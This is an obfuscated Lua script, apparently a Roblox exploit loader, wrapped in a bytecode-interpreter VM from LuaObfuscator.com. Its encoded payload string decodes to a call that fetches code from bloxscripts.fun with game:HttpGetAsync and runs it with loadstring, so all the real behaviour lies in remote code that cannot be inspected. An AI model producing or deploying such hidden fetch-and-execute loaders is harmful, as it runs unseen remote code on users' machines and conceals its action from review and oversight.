--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==5) then v16=nil;function v16(v25,v26,...)local v27=1;local v28;v25=v5(v4(v25,5),"..",function(v39)if (v2(v39,2)==79) then v28=v1(v4(v39,1,1));return "";else local v78=v3(v1(v39,16));if v28 then local v88=0;local v89;while true do if (v88==1) then return v89;end if (v88==0) then v89=v6(v78,v28);v28=nil;v88=1;end end else return v78;end end end);local function v29(v40,v41,v42)if v42 then local v79=229 -(105 + 116 + 8) ;local v80;while true do if (v79==(0 + 0)) then v80=(v40/(((368 + 1187) -((2132 -(1195 + 11)) + 627))^(v41-(1 + 0))))%((1943 -(797 + 1144))^(((v42-(222 -(151 + 70))) -(v41-(1724 -((2309 -1703) + (2217 -(846 + 254)))))) + 1)) ;return v80-(v80%(1 + 0)) ;end end else local v81=(1114 -(344 + 55 + 713))^(v41-((3 -2) + 0)) ;return (((v40%(v81 + v81))>=v81) and (1 + 0)) or (0 -0) ;end end local function v30()local v47=v2(v25,v27,v27);v27=v27 + 1 ;return v47;end local function v31()local v48=(96 -(51 + 45)) -0 ;local v49;local v50;while true do if (v48==(0 -0)) then v49,v50=v2(v25,v27,v27 + 2 + 0 );v27=v27 + (4 -2) ;v48=1 + 0 ;end if (1==v48) then return (v50 * (28 + 228)) + v49 ;end end end local function v32()local v51,v52,v53,v54=v2(v25,v27,v27 + 3 );v27=v27 + 1 + 3 ;return (v54 * (70513215 -53735999)) + (v53 * 65536) + (v52 * (364 -(48 + 60))) + v51 ;end local function v33()local v55=0 + 0 + 0 ;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v55==(2 + (0 -0))) then v60=v29(v57,39 -18 ,31);v61=((v29(v57,72 -40 )==(894 -((2420 -(828 + 907)) + (747 -(178 + 361))))) and  -((2860 -(27 + 1750)) -(679 + 403))) or (1 -0) ;v55=1 + (1986 -(1915 + 69)) ;end if (v55==(0 + 0)) then v56=v32();v57=v32();v55=1671 -(32 + (6483 -4845)) ;end if ((1697 -(846 + 848))==v55) then if (v60==(0 + 0)) then if (v59==(0 + 0 + 0)) then return v61 * (0 + 0) ;else local v106=(1124 -(191 + 132)) -(534 + 267) ;while true do if (v106==(0 -0)) then v60=1899 -(414 + 1484) ;v58=0;break;end end end elseif (v60==(3499 -(387 + 301 + 764))) then return ((v59==(0 -0)) and (v61 * ((1 + 0)/(0 -0)))) or (v61 * NaN) ;end return v9(v61,v60-(2606 -(46 + 1537)) ) * (v58 + (v59/((2 + 0)^(45 + 7)))) ;end if (v55==(2 -1)) then v58=2 -1 ;v59=(v29(v57,1 + 0 ,29 -9 ) * (2^(9 + 23))) + v56 ;v55=(527 -(226 + 299)) + 0 ;end end end local function v34(v43)local v62;if  not v43 then local v82=0 -0 ;while true do if (v82==(0 -0)) then v43=v32();if (v43==(817 -(373 + 444))) then return "";end break;end end end v62=v4(v25,v27,(v27 + v43) -(3 -2) );v27=v27 + v43 ;local v63={};for v76=(1580 -(173 + 288)) -(523 + 595) , #v62 do v63[v76]=v3(v2(v4(v62,v76,v76)));end return v7(v63);end local v35=v32;local function v36(...)return {...},v13("#",...);end local function v37()local v64=1029 -(191 + 838) ;local v65;local v66;local v67;local v68;local v69;local v70;local v71;local v72;while true do if (v64==(1779 -(160 + 1616))) then v71=nil;v72=nil;v64=6 -2 ;end if (v64~=2) then else v69=nil;v70=nil;v64=2 + 1 ;end if (v64==1) then v67=nil;v68=nil;v64=2;end if ((640 -(264 + 372))==v64) then while true do if (v65==0) then local v104=0 -0 ;while true do if (v104~=(2 -1)) then else v65=1 + 0 ;break;end if (v104==0) then v66=0 + 0 ;v67=nil;v104=1566 -(594 + 971) ;end end end if ((551 -(161 + 387))~=v65) then else v72=nil;while true do local v107=0 + 0 ;local v108;while true do if ((0 -0)~=v107) then else v108=0 -0 ;while true do if (v108==(0 -0)) then local v116=0;while true do if (v116==0) then if (v66==3) then local v143=158 -(122 + 36) ;local v144;while true do if (v143==(0 -0)) then v144=1371 -(1252 + 119) ;while true do if (v144==0) then for v162=1 -0 ,v32() do v68[v162-1 ]=v37();end for v164=1,v32() do v69[v164]=v32();end v144=2 -1 ;end if (v144==1) then return v70;end end break;end end end if (v66~=0) then else local v145=0 -0 ;local v146;while true do if (0==v145) then v146=1719 -(107 + 1612) ;while true do if (v146~=(0 -0)) then else local v158=0;local v159;while true do if ((0 -0)~=v158) then else v159=140 -(56 + 84) ;while true do if (v159~=(0 + 0)) then else v67={};v68={};v159=2 -1 ;end if (v159~=(1 + 0)) then else v146=2 -1 ;break;end end break;end end end if (v146~=(592 -(556 + 35))) then else v69={};v66=1;break;end end break;end end end v116=1;end if (v116==1) then v108=1;break;end end end if (v108==(1 + 0)) then if (v66==2) then local v134=1068 -(1036 + 32) ;local v135;local v136;while true do if (v134==1) then while true do if (v135==(1150 -(1024 + 126))) then v136=0;while true do if (v136~=1) then else for v166=1 + 0 ,v32() do local v167=0 -0 ;local v168;local v169;local v170;while true do if (v167==1) then v170=nil;while true do if (v168==1) then while true do if (v169==(1734 -(1078 + 656))) then v170=v30();if (v29(v170,1 + 0 ,1)==0) then local v183=0 + 0 ;local v184;local v185;local v186;local v187;local v188;while true do if (v183~=(62 -(15 + 46))) then else v186=nil;v187=nil;v183=2;end if (v183~=2) then else v188=nil;while true do if ((0 + 0)~=v184) then else local v190=0 -0 ;while true do if (v190==1) then v184=1 + 0 ;break;end if (v190~=(0 -0)) then else v185=1764 -(545 + 1219) ;v186=nil;v190=1;end end end if (v184==(2 -1)) then v187=nil;v188=nil;v184=2 -0 ;end if (v184~=(457 -(117 + 338))) then else while true do if (v185==(1 + 1)) then local v191=0;while true do if (v191==(0 + 0)) then local v198=0 -0 ;local v199;while true do if (v198~=(0 -0)) then else v199=0;while true do if (v199==0) then if (v29(v187,1,1101 -(850 + 250) )~=1) then else v188[2]=v72[v188[2]];end if (v29(v187,217 -(93 + 122) ,934 -(126 + 806) )~=1) then else v188[3]=v72[v188[3]];end v199=2 -1 ;end if (v199~=1) then else v191=1;break;end end break;end end end if ((1 + 0)==v191) then v185=3;break;end end end if (1~=v185) then else local v192=509 -(465 + 44) ;local v193;while true do if (v192==0) then v193=0;while true do if (v193~=1) then else v185=2;break;end if (v193==(0 -0)) then local v201=0;local v202;while true do if (v201==0) then v202=0;while true do if (v202==(1 -0)) then v193=1956 -(292 + 1663) ;break;end if (v202~=0) then else v188={v31(),v31(),nil,nil};if (v186==(1690 -(1133 + 557))) then local v207=0 + 0 ;local v208;local v209;while true do if (v207==(0 -0)) then v208=0;v209=nil;v207=1;end if (v207~=(1618 -(380 + 1237))) then else while true do if (v208~=0) then else v209=1485 -(64 + 1421) ;while true do if (v209==0) then v188[1098 -(1066 + 29) ]=v31();v188[4]=v31();break;end end break;end end break;end end elseif (v186==(406 -(135 + 270))) then v188[3 + 0 ]=v32();elseif (v186==2) then v188[3]=v32() -((1449 -(600 + 847))^(298 -(102 + 180))) ;elseif (v186==(7 -4)) then local v212=0 + 0 ;while true do if ((0 -0)==v212) then v188[3]=v32() -((8 -6)^16) ;v188[11 -7 ]=v31();break;end end end v202=1111 -(771 + 339) ;end end break;end end end end break;end end end if (v185==(7 -4)) then if (v29(v187,3,3)==1) then v188[10 -6 ]=v72[v188[4]];end v67[v166]=v188;break;end if (v185==0) then local v195=0;while true do if (v195~=(0 + 0)) then else local v200=0;while true do if (v200==1) then v195=2 -1 ;break;end if (v200==0) then v186=v29(v170,2,1059 -(275 + 781) );v187=v29(v170,13 -9 ,6);v200=1;end end end if (v195==(2 -1)) then v185=1;break;end end end end break;end end break;end if (v183==0) then v184=522 -(421 + 101) ;v185=nil;v183=1;end end end break;end end break;end if (v168~=(0 -0)) then else local v176=0;local v177;while true do if (v176==0) then v177=0;while true do if (v177~=(1 + 0)) then else v168=1;break;end if (v177~=(1429 -(93 + 1336))) then else local v189=1586 -(1543 + 43) ;while true do if (v189==(1606 -(720 + 886))) then v169=0 + 0 ;v170=nil;v189=2 -1 ;end if (v189==(1 + 0)) then v177=1;break;end end end end break;end end end end break;end if (v167==0) then local v174=0;while true do if (v174==(0 + 0)) then v168=0;v169=nil;v174=1 + 0 ;end if (v174==(1 -0)) then v167=1;break;end end end end end v66=3;break;end if ((0 -0)==v136) then local v160=0;local v161;while true do if (v160==0) then v161=0;while true do if (v161==0) then for v178=1,v71 do local v179=0;local v180;local v181;while true do if (v179==0) then v180=v30();v181=nil;v179=822 -(239 + 582) ;end if (v179==(1 + 0)) then if (v180==(3 -2)) then v181=v30()~=0 ;elseif (v180==2) then v181=v33();elseif (v180~=(1 + 2)) then else v181=v34();end v72[v178]=v181;break;end end end v70[3]=v30();v161=1947 -(912 + 1034) ;end if (v161==(1 -0)) then v136=1 + 0 ;break;end end break;end end end end break;end end break;end if (v134==(0 -0)) then v135=0 + 0 ;v136=nil;v134=2 -1 ;end end end if (v66==1) then local v137=0 + 0 ;while true do if (v137==(0 + 0)) then v70={v67,v68,nil,v69};v71=v32();v137=1 + 0 ;end if (v137~=(3 -2)) then else v72={};v66=221 -(108 + 111) ;break;end end end break;end end break;end end end break;end if (v65~=(1 + 1)) then else v70=nil;v71=nil;v65=3;end if (v65==1) then local v105=0;while true do if (v105==1) then v65=1 + 1 ;break;end if (v105~=(0 + 0)) then else v68=nil;v69=nil;v105=1;end end end end break;end if (v64~=(0 + 0)) then else v65=0;v66=nil;v64=1;end end end local function v38(v44,v45,v46)local v73=v44[1];local v74=v44[2];local v75=v44[3];return function(...)local v83=1;local v84= -1;local v85={...};local v86=v13("#",...) -1 ;local function v87()local v90=v73;local v91=v74;local v92=v75;local v93=v36;local v94={};local v95={};local v96={};for v102=713 -(578 + 135) ,v86 do if (((5704 -1967)>(1130 + 29 + 957)) and (v102>=v92)) then v94[v102-v92 ]=v85[v102 + 1 + 0 ];else v96[v102]=v85[v102 + (1567 -(129 + 1437)) ];end end local v97=(v86-v92) + (604 -(593 + 10)) ;local v98;local v99;while true do local v103=(0 + 0) -0 ;while true do if (((3984 -(958 + 348))==(1449 + 77 + 1152)) and (v103==(106 -(20 + 85)))) then if ((267<(7543 -(6182 -2801))) and (v99<=(8 -5))) then if (((155 + 107)==(1281 -(752 + 267))) and (v99<=1)) then if ((v99==(410 -((66 -32) + 376))) or ((1619 + 1460)==4646)) then local v117=0 -0 ;local v118;local v119;local v120;local v121;local v122;while true do if ((3483>=(39 + 637)) and ((0 -0)==v117)) then local v138=0 -0 ;while true do if (((10262 -5400)>=((17138 -(1218 + 232)) -11637)) and (v138==(0 -0))) then v118=1688 -(726 + 962) ;v119=nil;v138=3 -2 ;end if ((1==v138) or ((3936 -(26 + 154 + 1341))>((2902 + 206) -(172 + 101)))) then v117=1;break;end end end if ((2==v117) or ((1410 + 2125)==(3462 + 947))) then v122=nil;while true do if (((6 -4)==v118) or ((2202 -(576 + 339))<(234 + 481))) then for v154=v119,v84 do local v155=0 + 0 ;local v156;while true do if ((v155==0) or (4658==(1387 + 1580))) then v156=0 -0 ;while true do if (((9075 -4455)>=(4162 -(106 + 53))) and (v156==(0 -0))) then v122=v122 + 1 ;v96[v154]=v120[v122];break;end end break;end end end break;end if (((3550 -(241 + 324))<=(1557 + 2001)) and (v118==1)) then local v147=260 -(13 + 247) ;while true do if ((v147==(0 + 0)) or ((6486 -4920)>(6409 -3182))) then local v157=1046 -(334 + 712) ;while true do if (((1256 -(39 + 1216))==v157) or ((1796 + 8)>=((5896 -3014) + 1801))) then v147=280 -(169 + 110) ;break;end if (((619 + 352 + 680)<(2204 + 783)) and (v157==0)) then v84=(v121 + v119) -(1 + 0) ;v122=0;v157=3 -2 ;end end end if ((v147==1) or ((6319 -(61 + 1525))<=3710)) then v118=1286 -(952 + 332) ;break;end end end if ((v118==(1180 -(232 + 948))) or ((3693 -2948)>=(6355 -3910))) then local v148=0;local v149;while true do if ((v148==(0 -0)) or ((3312 + 252)==(1632 -418))) then v149=1403 -(1195 + 208) ;while true do if ((v149==1) or ((4736 -2592)>=3378)) then v118=1;break;end if ((v149==(467 -(100 + 367))) or (((3346 -(779 + 835)) -(83 + 4 + 328))>(2027 + (3018 -(289 + 29))))) then v119=v98[3 -1 ];v120,v121=v93(v96[v119](v14(v96,v119 + (797 -(243 + 553)) ,v98[8 -5 ])));v149=2 -1 ;end end break;end end end end break;end if ((v117==(1 + 0)) or ((3996 -((1603 -416) + 532))==980)) then v120=nil;v121=nil;v117=3 -1 ;end end else v96[v98[842 -(16 + 824) ]]=v46[v98[2 + 1 ]];end elseif ((1710==(7509 -5799)) and (v99==(3 -1))) then local v125=257 -(203 + 54) ;local v126;local v127;while true do if ((v125==(2 -(1 + 0))) or ((756 + 849)>(12080 -7703))) then v96[v126 + (1 -0) ]=v127;v96[v126]=v127[v98[14 -10 ]];break;end if ((((1639 -(1242 + 397)) + 0)==v125) or ((4693 -(83 + 476))==3407)) then local v142=0 -0 ;while true do if (((6816 -4255)<=(6435 -1569)) and (v142==1)) then v125=1 + (1617 -(554 + 1063)) ;break;end if ((v142==(0 + 0)) or ((1693 -842)==724)) then v126=v98[1111 -(32 + 1077) ];v127=v96[v98[1762 -(517 + (1971 -729)) ]];v142=1 -0 ;end end end end else do return;end end elseif (((12459 -8931)>=3061) and (v99<=5)) then if ((v99==(14 -10)) or (2040==(874 + 3699))) then v96[v98[1 + 1 ]]=v98[(3 + 1) -1 ]~=(0 -0) ;else local v129=1456 -(1266 + 190) ;local v130;local v131;while true do if ((((4353 + 1499) -(455 + 1126 + 341))>(1082 -780)) and (v129==(0 + 0))) then v130=0;v131=nil;v129=(1792 -(745 + 1044)) -2 ;end if ((v129==(258 -(200 + 57))) or ((1951 -(1118 + 172))>=(3432 -(67 + 417)))) then while true do if ((v130==(0 + 0)) or ((2909 + 1945)==((227 -(185 + 22)) + 2))) then v131=v98[2];v96[v131]=v96[v131](v14(v96,v131 + (1 -0) + 0 ,v84));break;end end break;end end end elseif ((v99>(9 -3)) or (3065<873)) then v96[v98[1 + 1 ]]=v98[14 -11 ];else v96[v98[5 -3 ]]();end v83=v83 + (3 -2) ;break;end if ((v103==0) or (1030>=(3084 + 555))) then local v113=0 + 0 ;while true do if ((v113==0) or (1429==(1621 -1097))) then v98=v90[v83];v99=v98[(280 + 953) -(605 + 627) ];v113=717 -(145 + 571) ;end if ((((2 -1) + 0)==v113) or ((108 + 58)>(3586 -(246 + (40 -25))))) then v103=1;break;end end end end end end A,B=v36(v12(v87));if  not A[1] then local v100=0;local v101;while true do if (v100==0) then v101=v44[4][v83] or "?" ;error("Script error at ["   .. v101   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end end;end return v38(v37(),{},v26)(...);end v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D65030C3O00482O74704765744173796E63032E3O00682O7470733A2O2F626C6F78736372697074732E66756E2F736372697074732F386435303837313634372E6C756100093O0012013O00013O001201000100023O002002000100010003001207000300044O0004000400016O000100044O00055O00022O00063O000100012O00033O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end end end
